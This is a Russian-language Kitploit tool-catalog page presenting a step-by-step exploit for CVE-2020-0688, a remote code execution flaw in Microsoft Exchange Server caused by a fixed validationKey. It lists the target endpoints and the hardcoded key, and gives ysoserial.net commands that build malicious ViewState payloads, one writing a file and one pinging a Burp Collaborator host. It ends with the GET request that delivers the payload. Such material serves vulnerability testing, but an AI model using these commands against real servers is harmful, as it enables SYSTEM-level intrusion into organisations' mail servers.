Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/murataydemir/cve-2020-0688
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmurataydemir/cve-2020-0688

CVE-2020-0688

[CVE-2020-0688] Microsoft Exchange Server — удаленное выполнение кода (RCE) через фиксированный криптографический ключ

Репозиторий
415 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

[CVE-2020-0688] Microsoft Exchange Server: удаленное выполнение кода (RCE) через фиксированный криптографический ключ


Вместо случайно генерируемых для каждой установки ключей все установки Microsoft Exchange Server имеют одинаковые значения validationKey и decryptionKey в web.config. Таким образом, аутентифицированный злоумышленник может заставить сервер десериализовать вредоносно сформированные данные ViewState. С помощью YSoSerial.net злоумышленник может выполнить произвольный .NET-код на сервере в контексте веб-приложения Exchange Control Panel (ECP), которое работает с привилегиями SYSTEM.

Шаг 1: Посетите один из следующих endpoint-ов и получите доступ к странице аутентификации

  • http(s)://exchangeserver/owa
  • http(s)://exchangeserver/owa/auth.owa
  • http(s)://exchangeserver/owa/auth/logon.aspx
  • http(s)://exchangeserver/ecp
  • http(s)://exchangeserver/ecp/default.aspx

Шаг 2: Войдите с учётными данными (независимо от привилегий учётной записи) и получите валидные значения ASP_NET_SessionId и __VIEWSTATEGENERATOR из Cookie HTTP-ответа и тела HTTP-ответа соответственно. Например

  • ASP_NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
  • __VIEWSTATEGENERATOR: B97B4E27
  • validationKey (фиксированный): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
  • validationalg (фиксированный): SHA1

Шаг 3: Чтобы сгенерировать payload (для проверки уязвимости), используйте YSoSerial.net

Обратите внимание: если у вас есть доступ к серверу Exchange жертвы, вы можете использовать следующий payload, который создаст текстовый файл с именем PoC.txt в каталоге C:\

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

Однако, если у вас нет доступа к серверу, следующий вариант может быть лучше.

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

Шаг 4: После шага 4 у нас будет URL-encoded payload ViewState. Выполните GET-запрос к указанному ниже endpoint в следующем формате

root@kitploit:~
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>

Оригинальный пост в блоге доступен здесь

Скачать инструмент